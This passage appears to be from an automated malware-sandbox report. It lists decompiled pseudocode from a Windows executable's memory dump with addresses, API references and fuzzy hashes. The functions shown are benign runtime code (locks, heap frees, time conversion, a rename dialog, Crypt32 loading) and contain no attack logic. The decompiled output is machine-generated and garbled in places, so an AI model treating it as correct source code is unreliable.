    								goto L5;
    							} else {
    								 *0x88fe5c = _t3;
    								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
    								if(_t6 == 0) {
    									goto L5;
    								} else {
    									 *0x88fe60 = _t6;
    								}
    							}
    						} else {
    							L5:
    							_t14 = 1;
    						}
    						asm("lock cmpxchg [edx], ecx");
    						if(0 != 0 || _t14 != 1) {
    							if(0 != 1) {
    								_t5 = 1;
    							} else {
    								goto L12;
    							}
    						} else {
    							L12:
    							_t5 = 0;
    						}
    						return _t5;
    					} else {
    						return 1;
    					}
    				} else {
    					return 0;
    				}
    			}








    0x0084d2d0
    0x0084d2db
    0x0084d2e3
    0x0084d2f5
    0x0084d2f9
    0x0084d305
    0x0084d30d
    0x00000000
    0x0084d30f
    0x0084d315
    0x0084d31a
    0x0084d322
    0x00000000
    0x0084d324
    0x0084d324
    0x0084d324
    0x0084d322
    0x0084d2fb
    0x0084d2fb
    0x0084d2fb
    0x0084d2fb
    0x0084d332
    0x0084d338
    0x0084d340
    0x0084d346
    0x00000000
    0x00000000
    0x00000000
    0x0084d342
    0x0084d342
    0x0084d342
    0x0084d342
    0x0084d34a
    0x0084d2e5
    0x0084d2e8
    0x0084d2e8
    0x0084d2dd
    0x0084d2e0
    0x0084d2e0

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
    • API String ID: 0-1718035505
    • Opcode ID: c42b39112934f3f3fda5028ae1d69104ea6926897216ac2baa340fc03696d1e9
    • Instruction ID: 69a89615687d99ce282f9dc9a33321b85611dfab324be8966d97a9f51221ee20
    • Opcode Fuzzy Hash: c42b39112934f3f3fda5028ae1d69104ea6926897216ac2baa340fc03696d1e9
    • Instruction Fuzzy Hash: 5101287224173A9B4F205FB86C9059B33C8FA07715311117AE651EB352E799D844E7A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00857601(signed int __ecx) {
    				intOrPtr _t7;
    
    				asm("lock xadd [eax], ecx");
    				if((__ecx | 0xffffffff) == 0) {
    					_t7 =  *0x86dd40; // 0x5b22e8
    					if(_t7 != 0x86db20) {
    						E00857AC6(_t7);
    						 *0x86dd40 = 0x86db20;
    					}
    				}
    				E00857AC6( *0x890410);
    				 *0x890410 = 0;
    				E00857AC6( *0x890414);
    				 *0x890414 = 0;
    				E00857AC6( *0x890860);
    				 *0x890860 = 0;
    				E00857AC6( *0x890864);
    				 *0x890864 = 0;
    				return 1;
    			}




    0x0085760a
    0x0085760e
    0x00857610
    0x0085761c
    0x0085761f
    0x00857625
    0x00857625
    0x0085761c
    0x00857631
    0x0085763e
    0x00857644
    0x0085764f
    0x00857655
    0x00857660
    0x00857666
    0x0085766e
    0x00857677

    APIs
    • _free.LIBCMT ref: 0085761F
      • Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
      • Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE
    • _free.LIBCMT ref: 00857631
    • _free.LIBCMT ref: 00857644
    • _free.LIBCMT ref: 00857655
    • _free.LIBCMT ref: 00857666
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID: "[
    • API String ID: 776569668-3208272576
    • Opcode ID: a7cc8df9a01301a4888bd68bfe249224ac857c6335348377f4d0c5aa9ef0f8a0
    • Instruction ID: 6ab85290da1ef1482926849c4cfc53531e55479503d00a02388b4e7c86f4b3dd
    • Opcode Fuzzy Hash: a7cc8df9a01301a4888bd68bfe249224ac857c6335348377f4d0c5aa9ef0f8a0
    • Instruction Fuzzy Hash: 5AF05471E08728AF8652FF19BC0181D3BA8FB6575670E5127F924D6272C77006058FC6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E00840938(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
    				char _v16;
    				struct _SYSTEMTIME _v32;
    				struct _SYSTEMTIME _v48;
    				struct _FILETIME _v64;
    				struct _FILETIME _v72;
    				intOrPtr _v76;
    				struct _FILETIME _v84;
    				intOrPtr _t47;
    				long _t61;
    				intOrPtr* _t66;
    				long _t72;
    				intOrPtr _t73;
    				intOrPtr* _t76;
    
    				_t73 = __edx;
    				_t66 = _a4;
    				_t76 = __ecx;
    				_v48.wYear =  *_t66;
    				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
    				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
    				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
    				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
    				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
    				_v48.wMilliseconds = 0;
    				_v48.wDayOfWeek.wYear = 0;
    				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
    					 *_t76 = 0;
    					 *((intOrPtr*)(_t76 + 4)) = 0;
    				} else {
    					if(E0083AA39() >= 0x600) {
    						FileTimeToSystemTime( &_v64,  &_v32);
    						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
    						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
    						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
    						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
    						asm("sbb eax, [esp+0x24]");
    						asm("sbb eax, edi");
    						asm("adc eax, edi");
    						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
    						asm("adc eax, edi");
    					} else {
    						LocalFileTimeToFileTime( &_v64,  &_v72);
    						_t61 = _v72.dwHighDateTime.dwLowDateTime;
    						_t72 = _v72.dwLowDateTime;
    					}
    					 *_t76 = E0084DE00(_t72, _t61, 0x64, 0);
    					 *((intOrPtr*)(_t76 + 4)) = _t73;
    				}
    				_t47 =  *((intOrPtr*)(_t66 + 0x18));
    				 *_t76 =  *_t76 + _t47;
    				asm("adc [esi+0x4], edi");
    				return _t47;
    			}
















    0x00840938
    0x0084093c
    0x0084094b
    0x0084094d
    0x00840956
    0x0084095f
    0x00840968
    0x00840971
    0x0084097a
    0x00840981
    0x00840986
    0x0084099a
    0x00840a36
    0x00840a38
    0x008409a0
    0x008409ac
    0x008409d2
    0x008409e3
    0x008409f3
    0x008409ff
    0x00840a07
    0x00840a0d
    0x00840a15
    0x00840a1b
    0x00840a1d
    0x00840a21
    0x008409ae
    0x008409b8
    0x008409be
    0x008409c2
    0x008409c2
    0x00840a2d
    0x00840a2f
    0x00840a2f
    0x00840a3b
    0x00840a3e
    0x00840a40
    0x00840a4a

    APIs
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00840996
      • Part of subcall function 0083AA39: GetVersionExW.KERNEL32(?), ref: 0083AA5E
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008409B8
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008409D2
    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008409E3
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008409F3
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008409FF
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion
    • String ID:
    • API String ID: 2092733347-0
    • Opcode ID: 68ec5e376f1e97b19e74fc757a521d1723042646b62a4ee3d301de9aad4dd782
    • Instruction ID: c436f2f57f416bc73a58ca44ff99ddad4d6418040d13c7083abd4c2beb3b2321
    • Opcode Fuzzy Hash: 68ec5e376f1e97b19e74fc757a521d1723042646b62a4ee3d301de9aad4dd782
    • Instruction Fuzzy Hash: DA31D57A1083459BC704DFA9C88099BB7E8FF98704F04591EFA99C3210E730E549CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00848C4D(signed int _a4, intOrPtr _a8, signed int* _a12) {
    				void* _t16;
    				signed int _t22;
    				void* _t25;
    				signed int _t30;
    				signed int* _t34;
    
    				_t34 = _a12;
    				if(_t34 != 0) {
    					_t32 = _a8;
    					_t25 = 0x10;
    					if(E0084F3CA(_a8, 0x8640bc, _t25) == 0) {
    						L13:
    						_t30 = _a4;
    						 *_t34 = _t30;
    						L14:
    						 *((intOrPtr*)( *_t30 + 4))(_t30);
    						_t16 = 0;
    						L16:
    						return _t16;
    					}
    					if(E0084F3CA(_t32, 0x8640fc, _t25) != 0) {
    						if(E0084F3CA(_t32, 0x8640dc, _t25) != 0) {
    							if(E0084F3CA(_t32, 0x8640ac, _t25) != 0) {
    								if(E0084F3CA(_t32, 0x86414c, _t25) != 0) {
    									if(E0084F3CA(_t32, 0x86409c, _t25) != 0) {
    										 *_t34 =  *_t34 & 0x00000000;
    										_t16 = 0x80004002;
    										goto L16;
    									}
    									goto L13;
    								}
    								_t30 = _a4;
    								_t22 = _t30 + 0x10;
    								L11:
    								asm("sbb ecx, ecx");
    								 *_t34 =  ~_t30 & _t22;
    								goto L14;
    							}
    							_t30 = _a4;
    							_t22 = _t30 + 0xc;
    							goto L11;
    						}
    						_t30 = _a4;
    						_t22 = _t30 + 8;
    						goto L11;
    					}
    					_t30 = _a4;
    					_t22 = _t30 + 4;
    					goto L11;
    				}
    				return 0x80004003;
    			}








    0x00848c51
    0x00848c56
    0x00848c64
    0x00848c69
    0x00848c7b
    0x00848d0a
    0x00848d0a
    0x00848d0d
    0x00848d0f
    0x00848d12
    0x00848d15
    0x00848d21
    0x00000000
    0x00848d22
    0x00848c92
    0x00848cad
    0x00848cc8
    0x00848ce3
    0x00848d08
    0x00848d19
    0x00848d1c
    0x00000000
    0x00848d1c
    0x00000000
    0x00848d08
    0x00848ce5
    0x00848ce8
    0x00848ceb
    0x00848cef
    0x00848cf3
    0x00000000
    0x00848cf3
    0x00848cca
    0x00848ccd
    0x00000000
    0x00848ccd
    0x00848caf
    0x00848cb2
    0x00000000
    0x00848cb2
    0x00848c94
    0x00848c97
    0x00000000
    0x00848c97
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _memcmp
    • String ID:
    • API String ID: 2931989736-0
    • Opcode ID: 6ab6cfe47100e64d9df8960f543776835446a8d94c068247af72bd4372c9cfe8
    • Instruction ID: aa08ccb8bcc13dde0866b1a0f97bf5a484c6964da4231ccf7c618011b548e105
    • Opcode Fuzzy Hash: 6ab6cfe47100e64d9df8960f543776835446a8d94c068247af72bd4372c9cfe8
    • Instruction Fuzzy Hash: 9B21AF72A0120EEBDB149E14CC81F3F77ACFB60748F119529FD04DB242EA34ED4586A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00858571(void* __ebx, void* __ecx, void* __edx) {
    				void* __edi;
    				void* __esi;
    				intOrPtr _t2;
    				void* _t3;
    				void* _t4;
    				intOrPtr _t9;
    				void* _t11;
    				void* _t20;
    				void* _t21;
    				void* _t23;
    				void* _t25;
    				void* _t27;
    				void* _t29;
    				void* _t31;
    				void* _t32;
    				long _t36;
    				long _t37;
    				void* _t40;
    
    				_t29 = __edx;
    				_t23 = __ecx;
    				_t20 = __ebx;
    				_t36 = GetLastError();
    				_t2 =  *0x86d6ac; // 0x6
    				_t42 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L2:
    					_t3 = E00857B91(_t23, 1, 0x364);
    					_t31 = _t3;
    					_pop(_t25);
    					if(_t31 != 0) {
    						_t4 = E00859C04(_t25, _t36, __eflags,  *0x86d6ac, _t31);
    						__eflags = _t4;
    						if(_t4 != 0) {
    							E008583E3(_t25, _t31, 0x890418);
    							E00857AC6(0);
    							_t40 = _t40 + 0xc;
    							__eflags = _t31;
    							if(_t31 == 0) {
    								goto L9;
    							} else {
    								goto L8;
    							}
    						} else {
    							_push(_t31);
    							goto L4;
    						}
    					} else {
    						_push(_t3);
    						L4:
    						E00857AC6();
    						_pop(_t25);
    						L9:
    						SetLastError(_t36);
    						E00857B4E(_t20, _t29, _t31, _t36);
    						asm("int3");
    						_push(_t20);
    						_push(_t36);
    						_push(_t31);
    						_t37 = GetLastError();
    						_t21 = 0;
    						_t9 =  *0x86d6ac; // 0x6
    						_t45 = _t9 - 0xffffffff;
    						if(_t9 == 0xffffffff) {
    							L12:
    							_t32 = E00857B91(_t25, 1, 0x364);
    							_pop(_t27);
    							if(_t32 != 0) {
    								_t11 = E00859C04(_t27, _t37, __eflags,  *0x86d6ac, _t32);
    								__eflags = _t11;
    								if(_t11 != 0) {
    									E008583E3(_t27, _t32, 0x890418);
    									E00857AC6(_t21);
    									__eflags = _t32;
    									if(_t32 != 0) {
    										goto L19;
    									} else {
    										goto L18;
    									}
    								} else {
    									_push(_t32);
    									goto L14;
    								}
    							} else {
    								_push(_t21);
    								L14:
    								E00857AC6();
    								L18:
    								SetLastError(_t37);
    							}
    						} else {
    							_t32 = E00859BAE(_t25, _t37, _t45, _t9);
    							if(_t32 != 0) {
    								L19:
    								SetLastError(_t37);
    								_t21 = _t32;
    							} else {
    								goto L12;
    							}
    						}
    						return _t21;
    					}
    				} else {
    					_t31 = E00859BAE(_t23, _t36, _t42, _t2);
    					if(_t31 != 0) {
    						L8:
    						SetLastError(_t36);
    						return _t31;
    					} else {
    						goto L2;
    					}
    				}
    			}





















    0x00858571
    0x00858571
    0x00858571
    0x0085857b
    0x0085857d
    0x00858582
    0x00858585
    0x00858593
    0x0085859a
    0x0085859f
    0x008585a2
    0x008585a5
    0x008585b7
    0x008585bc
    0x008585be
    0x008585c9
    0x008585d0
    0x008585d5
    0x008585d8
    0x008585da
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x008585c0
    0x008585c0
    0x00000000
    0x008585c0
    0x008585a7
    0x008585a7
    0x008585a8
    0x008585a8
    0x008585ad
    0x008585e8
    0x008585e9
    0x008585ef
    0x008585f4
    0x008585f7
    0x008585f8
    0x008585f9
    0x00858600
    0x00858602
    0x00858604
    0x00858609
    0x0085860c
    0x0085861a
    0x00858626
    0x00858629
    0x0085862c
    0x0085863e
    0x00858643
    0x00858645
    0x00858650
    0x00858656
    0x0085865e
    0x00858660
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00858647
    0x00858647
    0x00000000
    0x00858647
    0x0085862e
    0x0085862e
    0x0085862f
    0x0085862f
    0x00858662
    0x00858663
    0x00858663
    0x0085860e
    0x00858614
    0x00858618
    0x0085866b
    0x0085866c
    0x00858672
    0x00000000
    0x00000000
    0x00000000
    0x00858618
    0x00858679
    0x00858679
    0x00858587
    0x0085858d
    0x00858591
    0x008585dc
    0x008585dd
    0x008585e7
    0x00000000
    0x00000000
    0x00000000
    0x00858591

    APIs
    • GetLastError.KERNEL32(?,008700E0,008533F4,008700E0,?,?,00852E6F,?,?,008700E0), ref: 00858575
    • _free.LIBCMT ref: 008585A8
    • _free.LIBCMT ref: 008585D0
    • SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585DD
    • SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585E9
    • _abort.LIBCMT ref: 008585EF
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: 3f97f58a7402b9d1dfbeb783a5e610ee1d5b26206cf61973870f0291547cc553
    • Instruction ID: 165b76a93e88303c57b5d8065ebefa0b797ee49780f08bf412df8b560cc1bf59
    • Opcode Fuzzy Hash: 3f97f58a7402b9d1dfbeb783a5e610ee1d5b26206cf61973870f0291547cc553
    • Instruction Fuzzy Hash: 08F0A436248A10BBD6127728BC07E5B255AFBE1733F264156FD14E2291FE618A098563
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 57%
    			E0083CE9B(void* __ebx, void* __ecx, void* __edi) {
    				void* __esi;
    				intOrPtr _t26;
    				signed int* _t30;
    				void* _t31;
    				void* _t34;
    				void* _t42;
    				void* _t44;
    				void* _t46;
    				void* _t48;
    				void* _t49;
    				void* _t50;
    
    				_t44 = __edi;
    				_t43 = __ecx;
    				_t42 = __ebx;
    				_t48 = _t49 - 0x64;
    				_t50 = _t49 - 0xac;
    				_t46 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
    					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
    					 *((char*)(_t48 + 8)) = 0;
    					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
    					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
    						E00841222( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
    					}
    					_t26 =  *((intOrPtr*)(_t48 + 0x70));
    					if(_t26 == 0) {
    						E0083FA8C(_t48 + 8, "s", 0x50);
    					} else {
    						_t34 = _t26 - 1;
    						if(_t34 == 0) {
    							_push(_t48 - 0x48);
    							_push("$%s");
    							goto L9;
    						} else {
    							if(_t34 == 1) {
    								_push(_t48 - 0x48);
    								_push("@%s");
    								L9:
    								_push(0x50);
    								_push(_t48 + 8);
    								E0083DA25();
    								_t50 = _t50 + 0x10;
    							}
    						}
    					}
    					_t30 = E00854EB6(_t42, _t43, _t44, _t46, _t48 + 0x58,  *((intOrPtr*)(_t46 + 0x14)),  *((intOrPtr*)(_t46 + 0x18)), 4, E0083CCDA);
    					if(_t30 == 0) {
    						goto L1;
    					} else {
    						_t20 = 0x86d158 +  *_t30 * 0xc; // 0x8633e0
    						E00855520( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
    						_t31 = 1;
    					}
    				} else {
    					L1:
    					_t31 = 0;
    				}
    				return _t31;
    			}














    0x0083ce9b
    0x0083ce9b
    0x0083ce9b
    0x0083ce9c
    0x0083cea0
    0x0083cea7
    0x0083cead
    0x0083cebd
    0x0083cec3
    0x0083cec7
    0x0083ceca
    0x0083ced5
    0x0083ced5
    0x0083cedd
    0x0083cee0
    0x0083cf1b
    0x0083cee2
    0x0083cee2
    0x0083cee5
    0x0083cefa
    0x0083cefb
    0x00000000
    0x0083cee7
    0x0083ceea
    0x0083ceef
    0x0083cef0
    0x0083cf00
    0x0083cf03
    0x0083cf05
    0x0083cf06
    0x0083cf0b
    0x0083cf0b
    0x0083ceea
    0x0083cee5
    0x0083cf31
    0x0083cf3b
    0x00000000
    0x0083cf41
    0x0083cf47
    0x0083cf50
    0x0083cf58
    0x0083cf58
    0x0083ceaf
    0x0083ceaf
    0x0083ceaf
    0x0083ceaf
    0x0083cf5f

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __fprintf_l_strncpy
    • String ID: $%s$0Z$@%s
    • API String ID: 1857242416-1489973951
    • Opcode ID: 251c9a26a2e411cb11cb6cdd524c2ef38be0adee7c6b0d679726dade8e0182be
    • Instruction ID: 4bc1cfde0e4d1b44e7ef36368eab054d725af4171ab5b57a3fbd8a6de46c6ea8
    • Opcode Fuzzy Hash: 251c9a26a2e411cb11cb6cdd524c2ef38be0adee7c6b0d679726dade8e0182be
    • Instruction Fuzzy Hash: F9216D72940208AFDF20DEA8DD05FEE7BA8FB54300F000112F915E61A2E7B5D658CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0084C2FD(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
    				void* _t12;
    				WCHAR* _t16;
    				void* _t17;
    				struct HWND__* _t18;
    				intOrPtr _t19;
    				void* _t20;
    				signed short _t23;
    
    				_t16 = _a16;
    				_t23 = _a12;
    				_t19 = _a8;
    				_t18 = _a4;
    				if(E008312D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
    					L10:
    					return 1;
    				}
    				_t20 = _t19 - 0x110;
    				if(_t20 == 0) {
    					 *0x88de34 = _t16;
    					SetDlgItemTextW(_t18, 0x66, _t16);
    					SetDlgItemTextW(_t18, 0x68,  *0x88de34);
    					goto L10;
    				}
    				if(_t20 != 1) {
    					L5:
    					return 0;
    				}
    				_t12 = (_t23 & 0x0000ffff) - 1;
    				if(_t12 == 0) {
    					GetDlgItemTextW(_t18, 0x68,  *0x88de34, 0x800);
    					_push(1);
    					L7:
    					EndDialog(_t18, ??);
    					goto L10;
    				}
    				if(_t12 == 1) {
    					_push(0);
    					goto L7;
    				}
    				goto L5;
    			}










    0x0084c2fe
    0x0084c303
    0x0084c308
    0x0084c30d
    0x0084c325
    0x0084c385
    0x00000000
    0x0084c387
    0x0084c327
    0x0084c32d
    0x0084c372
    0x0084c378
    0x0084c383
    0x00000000
    0x0084c383
    0x0084c332
    0x0084c341
    0x00000000
    0x0084c341
    0x0084c337
    0x0084c33a
    0x0084c35e
    0x0084c364
    0x0084c347
    0x0084c348
    0x00000000
    0x0084c348
    0x0084c33f
    0x0084c345
    0x00000000
    0x0084c345
    0x00000000

    APIs
      • Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
      • Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331
    • EndDialog.USER32(?,00000001), ref: 0084C348
    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0084C35E
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0084C378
    • SetDlgItemTextW.USER32(?,00000068), ref: 0084C383
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ItemText$DialogWindow
    • String ID: RENAMEDLG
    • API String ID: 445417207-3299779563
    • Opcode ID: 6d136850b5b99ab3e337e001ef92fb83fee35ea6cc358a428b75474842cb35ee
    • Instruction ID: 83cce49902ee5393301cf1dedcff9db36781e770b1ade312c610ec1bcd42fff9
    • Opcode Fuzzy Hash: 6d136850b5b99ab3e337e001ef92fb83fee35ea6cc358a428b75474842cb35ee
    • Instruction Fuzzy Hash: AE01F133A8231876E2505E696E49F3B7B6CF796B00F014015F201F62D0C6D2AC009772
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00856B9E(void* __ecx, void* __esi, intOrPtr _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _t10;
    				struct HINSTANCE__** _t12;
    				intOrPtr* _t23;
    				signed int _t25;
    
    				_t10 =  *0x86d668; // 0x14325215
    				_v8 = _t10 ^ _t25;
    				_v12 = _v12 & 0x00000000;
    				_t12 =  &_v12;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
    				if(_t12 != 0) {
    					_t23 = GetProcAddress(_v12, "CorExitProcess");
    					if(_t23 != 0) {
    						 *0x862260(_a4);
    						 *_t23();
    					}
    				}
    				if(_v12 != 0) {
    					FreeLibrary(_v12);
    				}
    				return E0084E243(_v8 ^ _t25);
    			}









    0x00856ba5
    0x00856bac
    0x00856baf
    0x00856bb3
    0x00856bbe
    0x00856bc6
    0x00856bd7
    0x00856bdb
    0x00856be2
    0x00856be8
    0x00856be8
    0x00856bea
    0x00856bef
    0x00856bf4
    0x00856bf4
    0x00856c07

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00856B4F,?,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002), ref: 00856BBE
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00856BD1
    • FreeLibrary.KERNEL32(00000000,?,?,?,00856B4F,?,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002,00000000), ref: 00856BF4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 879b700da92a81b41f2c3727b0779b048be680c001c8b7f8af0d84338e95de67
    • Instruction ID: ee52da62f8f98247f8264de7d89e904084cb8cea53714680bb9a110764738f55
    • Opcode Fuzzy Hash: 879b700da92a81b41f2c3727b0779b048be680c001c8b7f8af0d84338e95de67
    • Instruction Fuzzy Hash: D8F04431A05619BBCB159B94DC09F9EBFB8FB04716F4100A4F905E6260DBB49E54CA91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0083E819(struct HINSTANCE__** __ecx) {
    				void* _t5;
    				struct HINSTANCE__* _t6;
    				struct HINSTANCE__** _t9;
    
    				_t9 = __ecx;
    				if(__ecx[1] == 0) {
    					_t6 = E0083FD16(L"Crypt32.dll");
    					 *__ecx = _t6;
    					if(_t6 != 0) {
    						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
    						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
    						_t9[3] = _t6;
    					}
    					_t9[1] = 1;
    					return _t6;
    				}
    				return _t5;
    			}






    0x0083e81a
    0x0083e820
    0x0083e827
    0x0083e82c
    0x0083e830
    0x0083e845
    0x0083e848
    0x0083e84e
